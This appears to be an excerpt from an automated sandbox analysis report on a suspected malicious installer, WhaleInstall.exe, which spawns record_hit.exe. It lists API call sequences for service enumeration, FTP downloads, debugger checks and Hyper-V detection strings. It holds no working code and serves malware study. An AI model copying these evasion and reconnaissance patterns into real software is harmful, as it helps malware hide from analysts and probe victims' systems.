Code function: wm_ZeroAry,OpenSCManagerA,wm_Chr,EnumServicesStatusExA,GlobalAlloc,wm_Chr,EnumServicesStatusExA,wm_pbin,RtlMoveMemory,wm_pstr,wm_pstr,wm_pstr,OpenServiceA,QueryServiceConfigA,GlobalAlloc,QueryServiceConfigA,RtlMoveMemory,wm_pstr,wm_pstr,wm_pstr,wm_UCase,wm_UCase,wm_InStr,wm_UCase,wm_InStr,wm_UCase,wm_InStr,GlobalFree,CloseServiceHandle,GlobalFree,CloseServiceHandle, |
3_2_0040E292 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: OpenSCManagerA,EnumServicesStatusA,GlobalAlloc,EnumServicesStatusA,GlobalFree,CloseServiceHandle, |
3_2_0040DBE8 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
API coverage: 2.8 % |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_00419AF7 lstrcpyA,FindFirstFileA,GetLastError,SetLastError, |
3_2_00419AF7 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_00417689 InternetOpenA,wm_SpaceBin,InternetConnectA,FtpFindFirstFileA,FtpOpenFileA,wm_Open,wm_IsFileExist,wm_Open,wm_Open,wm_SeekToEnd,InternetSetFilePointer,wm_GetTickCount,InternetReadFile,wm_Close,wm_BinLeft,wm_WriteBin,wm_GetTickCount,CallWindowProcA,wm_Close,InternetCloseHandle, |
3_2_00417689 |
Source: WhaleInstall.exe, 00000000.00000002.3249830273.000002AA26C08000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWp |
Source: WhaleInstall.exe, 00000000.00000002.3249830273.000002AA26C55000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWQ |
Source: WhaleInstall.exe, 00000000.00000002.3249830273.000002AA26C8C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A7CDC0 free,IsDebuggerPresent,RaiseException, |
0_2_00007FF772A7CDC0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A77DE0 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress, |
0_2_00007FF772A77DE0 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_0040C827 wm_ZeroAry,OpenSCManagerA,EnumServicesStatusA,GetProcessHeap,HeapAlloc,EnumServicesStatusA,wm_pbin,RtlMoveMemory,wm_pstr,wm_pstr,OpenServiceA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,RtlMoveMemory,wm_UCase,wm_UCase,wm_InStr,wm_UCase,wm_InStr,wm_UCase,wm_InStr,GetProcessHeap,HeapFree,CloseServiceHandle,wm_DoEvents,GetProcessHeap,HeapFree,CloseServiceHandle, |
3_2_0040C827 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A61180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm, |
0_2_00007FF772A61180 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772B6E710 SetUnhandledExceptionFilter, |
0_2_00007FF772B6E710 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A78639 SetUnhandledExceptionFilter, |
0_2_00007FF772A78639 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_00420106 SetUnhandledExceptionFilter, |
3_2_00420106 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_00420118 SetUnhandledExceptionFilter, |
3_2_00420118 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A62793 ShellExecuteExW,ShellExecuteExW,WaitForSingleObject,CloseHandle, |
0_2_00007FF772A62793 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Process created: C:\Users\user\Desktop\record_hit.exe "C:\Users\user\Desktop\record_hit.exe" |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A7D3B0 GetSystemTimeAsFileTime,QueryPerformanceFrequency,GetSystemTimeAdjustment,_errno, |
0_2_00007FF772A7D3B0 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_004209A2 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,strlen, |
3_2_004209A2 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_0041D8BD GetVersionExA,GetEnvironmentVariableA,GetModuleFileNameA, |
3_2_0041D8BD |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_00415040 wm_BinLen,wm_SpaceBin,sprintf,wm_GetBinData, |
3_2_00415040 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_004121F8 wm_BinLen,SQLBindParameter, |
3_2_004121F8 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_004032F1 wm_GetBinData, |
3_2_004032F1 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_0040A363 OpenSCManagerA,OpenServiceA,QueryServiceConfigA,GlobalAlloc,QueryServiceConfigA,wm_pbin,wm_GetBinData,GlobalFree,CloseServiceHandle,CloseServiceHandle, |
3_2_0040A363 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_00411605 SQLAllocHandle,SQLPrepare,SQLFreeHandle,wm_BinLen,SQLBindParameter,wm_BinLen,SQLBindParameter,wm_BinLen,SQLBindParameter,wm_BinLen,SQLBindParameter,wm_BinLen,SQLBindParameter,SQLExecute,SQLRowCount,SQLFreeHandle, |
3_2_00411605 |